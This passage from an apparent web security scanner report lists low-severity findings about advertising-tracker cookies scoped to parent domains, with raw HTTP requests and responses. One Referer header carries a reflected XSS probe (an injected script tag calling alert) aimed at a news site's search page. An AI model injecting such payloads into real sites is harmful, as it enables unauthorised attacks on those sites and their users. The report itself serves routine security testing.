Set-Cookie: bkc=KJh56f2nxkWDOdeFv0B2oaO/ud//13a4x6+xxHeBMAjeWDaJ+B4xeNYAoHY03WYA4X9kzsL/Qi9SZbvCkiyvJchsDWnxmzMB5XfyfrwemPXrf2Npb0aQTzaYIm67qQsGAIKDWpSW8lNBhIijtQsbwJbNoHwv7ezrD3ND9opSPfyak0ct8vT62hFd+QwHJeYp6LipI8u8lfiBXg5aT/f0h+4vtyUoBKP6Ugoyvk6Ik7T2A78DFkKmcWolvQKP4zoqmK7NgnuqAHTBudwd1MT7lNyOQhf7kUrM6oylcrQ92CR+PB0ZPlrAAX3zBNbi8Vy4Kvf0KE415VBd9ciiIHMbSwup6hFuvVUms8I693s0CKc/If2+8HacIowZ0IrSL3rXmuc+PdTKkbT3F0M7h3xwkw7fM9B6cCz6726KntKAoNwudejtQ7EdI0lCuApVKEdMwydOXPQ=; expires=Tue, 13-Dec-2011 11:25:08 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 17-Jun-2011 11:25:08 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

10.282. http://tags.bluekai.com/site/450 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/450

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=XHUkELt76vid8JkA; expires=Tue, 13-Dec-2011 11:53:38 GMT; path=/; domain=.bluekai.com
bkc=KJh562XgxtWROdeFRqv5qWUnOVLoLdngyGNYvq7K8KuYoaC0pTD4+qUzAeJYgKD4Vvat86Jjui850xDlH+HStbHx0Fr6cMFwzlcKzpT2pfKlz2f78YlQg9w/kfTM8Ca8L8y3pfM3dFWOLyXVds2NE0+cqxCE7C6tNdQZ6mqykY65PSRXmt+3rHyxgc8ss7eo/T2+uP1dIfzjY1V90zPS7+0+EwlLJomdpxJlJLIIP+f/uYXgJ2nuZVwoy3c6bTc6Gdv2zZO4rkUj3IhuUA2JgIhvP8nuxl8oIkfLzImqvbewTqH0P6iSXrpKaZOfpAvhDF5uolH1Z4nLKqmzf9ewjEgFZ37m57r9Jp14dSPSwpZhvCNUoMpf3Ocyauy1OBfdquLwO3Ddpcy8UPVrvvIBugrPF6SA0XGF03kCbENkKMIth8pcCj7w5GzUA+/EzVZbLTBKXddlV1naLvpE4rydJFeI5y==; expires=Tue, 13-Dec-2011 11:53:38 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/450 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkst=KJh5Aean96WxCqz/vYShDVyDLqO5lBljljL+xyycAPmYQAk8+lLcvAx+RLeY0+8SgVNLHs+O0Y2//8SVSr5wzmfum5UylFeBpvrhNyPsBU78usgLM4okNG38ZJDW5sexscNdBuPdxFTZy0/pmSuK/bE9+4zoh8OswYoDg7B7gDSF7AFKkmq7tsCT1My5etXghY2Juy0NLySWOSz1vsBxt1cBJ2kJFqHOV0s1AaRbOSCOuM7ddDUt5q6Xx/zQGLyMpNtDzu7Hzyi88Nssl7MYW73gKriO8k5jr2UjfIyKfB7+yNffwnT1TfmTXwchEZM5PPrqM5kVJqx6uCLkbexxScGPjqlJV/wCCEXS2qoJF2X5gvp2Aw8mIQSEYisn7vv6CvEx1oWsvEpJlCjvtIjE0UCzdO4acfhCRY9=; bko=KJygasHQrwMo30XMyy8Cs/LOvvRaj3701MeG0np6aVYT9tVh11xJxPC1e/kx1PRswVS/UAbs4cRsOrRUpTabFUkCncDGiT1CPCeYRZvRh9jCzEsz8VjQIwfXruXpy6xGi8WCQRKO/KfJ1bYRaohNiHdYRZExTRVhJwARsBTalynv0QJj9HrF926c9JNqmKQ=; bkw5=KJh+Ae+n96WDCqd5P5iL1uoG+OYhDHYHRYhXB1S9WYHimgVhuDp73fYHa/vaFKeYakjqICzLnKpNeyCStwA3fwEK7xaczs9m92X5pMt7w96KvUGXfr5PrbwHY0Md/xXmbjNp0qTk+2zyLxePU1vAelAmN3YnmcC5Hwxg6lOJ5Vq1RXgmf7Cx8aCZ4UnH0iZigEBG0iEYwTUlDNoVkpCTSXmrxd3R+KH50J8eYkx+Dz2eCy0yqzZcdek00YYqkrMmcRz1DqBWz8hUGetu61GSKvARXipAzkPquq7hBD2hdUKeLYRl7tEArtb0qXZfCXKb3F7dUNL7ZVo0A2nLqP31QICJ+ueSWe4Ykwa9K0X8lkzqbo50JyweBOLxu1rKh71SdysJBNzw; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101qbH2+1Uv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6Bnxh9iQWlEOWs; bklc=4df9e812; bk=z+h8Pzt76vid8JkA; bkc=KJh56f2nxkWDOdeFv0B2oaO/ud//13a4x6+xxHeBMAjeWDaJ+B4xeNYAoHY03WYA4X9kzsL/Qi9SZbvCkiyvJchsDWnxmzMB5XfyfrwemPXrf2Npb0aQTzaYIm67qQsGAIKDWpSW8lNBhIijtQsbwJbNoHwv7ezrD3ND9opSPfyak0ct8vT62hFd+QwHJeYp6LipI8u8lfiBXg5aT/f0h+4vtyUoBKP6Ugoyvk6Ik7T2A78DFkKmcWolvQKP4zoqmK7NgnuqAHTBudwd1MT7lNyOQhf7kUrM6oylcrQ92CR+PB0ZPlrAAX3zBNbi8Vy4Kvf0KE415VBd9ciiIHMbSwup6hFuvVUms8I693s0CKc/If2+8HacIowZ0IrSL3rXmuc+PdTKkbT3F0M7h3xwkw7fM9B6cCz6726KntKAoNwudejtQ7EdI0lCuApVKEdMwydOXPQ=; bkdc=res

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:53:38 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 17 Jun 2011 11:53:38 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=XHUkELt76vid8JkA; expires=Tue, 13-Dec-2011 11:53:38 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh562XgxtWROdeFRqv5qWUnOVLoLdngyGNYvq7K8KuYoaC0pTD4+qUzAeJYgKD4Vvat86Jjui850xDlH+HStbHx0Fr6cMFwzlcKzpT2pfKlz2f78YlQg9w/kfTM8Ca8L8y3pfM3dFWOLyXVds2NE0+cqxCE7C6tNdQZ6mqykY65PSRXmt+3rHyxgc8ss7eo/T2+uP1dIfzjY1V90zPS7+0+EwlLJomdpxJlJLIIP+f/uYXgJ2nuZVwoy3c6bTc6Gdv2zZO4rkUj3IhuUA2JgIhvP8nuxl8oIkfLzImqvbewTqH0P6iSXrpKaZOfpAvhDF5uolH1Z4nLKqmzf9ewjEgFZ37m57r9Jp14dSPSwpZhvCNUoMpf3Ocyauy1OBfdquLwO3Ddpcy8UPVrvvIBugrPF6SA0XGF03kCbENkKMIth8pcCj7w5GzUA+/EzVZbLTBKXddlV1naLvpE4rydJFeI5y==; expires=Tue, 13-Dec-2011 11:53:38 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 17-Jun-2011 11:53:38 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

10.283. http://tap.rubiconproject.com/oz/feeds/targus/profile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cd=false; Domain=.rubiconproject.com; Expires=Sat, 16-Jun-2012 10:13:37 GMT; Path=/
lm="17 Jun 2011 10:13:37 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: ruid=154dc949b6adc1d6f327180e^2^1308305589^2915161843; put_2046=WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; rpb=5671%3D1%264212%3D1%265575%3D1; put_2081=AA-00000001931708427; put_1185=7183228360285489408; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZVv50oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; ses15=11953^1; csi15=3187871.js^1^1308305589^1308305589; cd=false; au=GP0ZDQX7-1OOR-10.214.142.175; dq=1|0|1|0

Response

HTTP/1.1 204 No Content
Date: Fri, 17 Jun 2011 10:13:37 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 16-Jun-2012 10:13:37 GMT; Path=/
Set-Cookie: dq=3|2|1|0; Expires=Sat, 16-Jun-2012 10:13:37 GMT; Path=/
Set-Cookie: xdp_ti="17 Jun 2011 10:13:37 GMT"; Version=1; Max-Age=604800; Path=/
Set-Cookie: lm="17 Jun 2011 10:13:37 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

10.284. http://tap.rubiconproject.com/oz/sensor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:11 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:11 GMT; Path=/
Set-Cookie: dq=12|4|8|0; Expires=Fri, 15-Jun-2012 11:27:11 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

10.285. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

khaos=GOVBRMNC-I-DXQD; Domain=.rubiconproject.com; Expires=Fri, 14-Jun-2019 11:28:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded&pc=6451/11953 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111; cd=false; dq=11|4|7|0

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:28:32 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 832
Cache-control: private
Set-Cookie: khaos=GOVBRMNC-I-DXQD; Domain=.rubiconproject.com; Expires=Fri, 14-Jun-2019 11:28:32 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close

var oo_profile={
tokenType : "0",
tracking : "",
tags : "Education,Mortgage Refinance,Business,Small Business,Finance",
tagcloud : [
{ tag: "Education", weight: 44},
{ tag: "Mortg
...[SNIP]...

10.286. http://va.px.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

segments_p1="eJwdkE9LAlEUxZmZt3i81Xyw9vUV+hgSFom20FXSH8zcREijszAkV+IkEbmJUkEQRsVooKHFCDNp95zN4ceZM+fe+4zScdcxSr9ubNFZZokuJ+DVI/woBJcX0BdmAjqlwDaO3u4L+ozfZNABCy4iaOsJziX9Rg5lgwT8nULHknT0UIsESN+9IfEcojZ3YIzue47brFUTJXa1gsiQk3sp+GgL9XdwOk3wfAp+b4HPN6jxNIKMfHFmsY2Zuz1pn+aVe1U5jtFe5HU+e70YvO5BF22uTr/chf5yg/EIq454zAOPLy35Pvxa+4BG19ig7gres2CdwigcCvYL+P+WdvJnyTYnoeV+ds5+FN4UW89OEaln9j/GpnXQ";Version=1;Path=/;Domain=invitemedia.com;Expires=Fri, 15-Jun-2012 12:52:46 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=66267&partner_uid=&partnerID=115&clientID=5408 HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; dp_rec="{\"1\": 1305981628+ \"3\": 1305981281+ \"2\": 1307963584+ \"4\": 1305981633}"; segments_p1="eJwdkL1qAlEUhNmf4nKrfbD0+go+hlgEJaYwlZIQ/GskSFa3MEisxFVCiE2IGhCEVVGyoKRYYTeaM9MMH7Ozc8652lbHvqVt9X4yRZeJIbpZgLcv8MMAXFpD35jx6RR9U1vqnBL0GK8l0BEL7kNo5xXOA/1mFmWjCPwTQ+eStNREifhItz6QGAeozaa1VkPXctrVSmSLXblDZMLJgxicO0O9C5xeG7z6Bn92wOUTalyFICN7zrzpYublCsiLPHa5R/BuAF13uS79Uh/6y6nzKdab8oBnHlzc8E34tfoFDR8xte4IPrFgF8MoZASHBfzfoB39GXLfdWA4s97twcY7YtNlHpF6Yv4D111xlA=="; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0Mjk0XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuHoXcAmwCjRcvbpexYFRo0pL4G0AaMFmM8lwvF6Ikj24MPrQFkGDQYDBgsGoOjk96xA0QsNm1FE34LVnkUT/b0QpHYumujdlyxA0RkfGlBEd85nFciS+PQeWVSUY+YPFoFWZolFp1GFd31lEZjIKHFu+f93yMKzgGZcY5S48vLfO2Sjz75gFWCW2Pf0Horox1dgx+26gCI6ayNI9Nb3gwhRACr9U2M="; io_freq_p1="eJzjEuZYliDAKNFy9ul7FgNGCzDNJcyxJF6ASeLgw+vvWRQYNBgMGCwYgIKPY4AqLzRsRhG8EAoUnIsm+DQAKDjjQwOSoAjHtlCBA0wSn96jiv4IFGhlllh0GlX0VqDAREaJc8v/v0M2dnOMALPEvqf3UASPglw1d9cFFMHucKDgre8HEYIA9TM+0g=="; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICI4NCI6IFsiRno2K0VTL2M5OU82ejVPQiIsIHRydWVdLCAiMTEzIjogWyJGUVdXQzJWSzJEV0YiLCB0cnVlXX0="

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 12:52:46 GMT
Set-Cookie: segments_p1="eJwdkE9LAlEUxZmZt3i81Xyw9vUV+hgSFom20FXSH8zcREijszAkV+IkEbmJUkEQRsVooKHFCDNp95zN4ceZM+fe+4zScdcxSr9ubNFZZokuJ+DVI/woBJcX0BdmAjqlwDaO3u4L+ozfZNABCy4iaOsJziX9Rg5lgwT8nULHknT0UIsESN+9IfEcojZ3YIzue47brFUTJXa1gsiQk3sp+GgL9XdwOk3wfAp+b4HPN6jxNIKMfHFmsY2Zuz1pn+aVe1U5jtFe5HU+e70YvO5BF22uTr/chf5yg/EIq454zAOPLy35Pvxa+4BG19ig7gres2CdwigcCvYL+P+WdvJnyTYnoeV+ds5+FN4UW89OEaln9j/GpnXQ";Version=1;Path=/;Domain=invitemedia.com;Expires=Fri, 15-Jun-2012 12:52:46 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1339004&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

10.287. http://va.px.invitemedia.com/set_partner_uid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

partnerUID="eyI4NCI6IFsic0hWeE81V245OU9Ma1BKQiIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Sat, 16-Jun-2012 11:21:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=84&partnerUID=sHVxO5Wn99OLkPJB&sscs_active=1 HTTP/1.1
Host: va.px.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&phint=__bk_t%3DInstant%20Approval%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&limit=4&r=96816336
Cookie: uid=2ecd6c1e-5306-444b-942d-9108b17fd086; dp_rec="{\"2\": 1305550329}"; subID="{}"; impressions="{\"580193\": [1306935751+ \"4374559481668266227\"+ 29712+ 11561+ 11823]+ \"580192\": [1307040195+ \"9198288361479058162\"+ 29710+ 11561+ 11823]+ \"580191\": [1307040245+ \"4069411748712299379\"+ 29707+ 11561+ 11823]}"; camp_freq_p1="eJzjkuH4vZBVgE3i6+b571kUmDX2XVvynsWA2WIfiA8AqWsMHA=="; io_freq_p1="eJzjEue4ECrAJvF18/z3LAoMGgwGzBb7QGwAYnAIbQ=="; exchange_uid=eyIyIjogWyI3MjI2NjQ0MDQyNjEwMjg3ODI1IiwgNzM0Mjg5XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI4MV19; conversions="{\"58602\": 1307041111}"; segments_p1=eJzjYub4x8HFwvHqJDOQ/HOCGQAkMQTF

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 17 Jun 2011 11:21:07 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Fri, 17-Jun-2011 11:20:47 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyI4NCI6IFsic0hWeE81V245OU9Ma1BKQiIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Sat, 16-Jun-2012 11:21:07 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.288. http://view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 18:32:40 GMT; path=/; domain=c3metrics.com
480-VT=adver_06-16-2011-18-06-44_13548876581308247604ZZZZadvertop100_06-16-2011-18-32-40_6866489311308249160; expires=Tue, 14-Jun-2016 18:32:40 GMT; path=/; domain=c3metrics.com
480-nUID=advertop100_6866489311308249160; expires=Thu, 16-Jun-2011 18:47:40 GMT; path=/; domain=c3metrics.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=advertop100&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response

10.289. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; Domain=.bizographics.com; Expires=Thu, 15-Dec-2011 23:22:22 GMT; Path=/
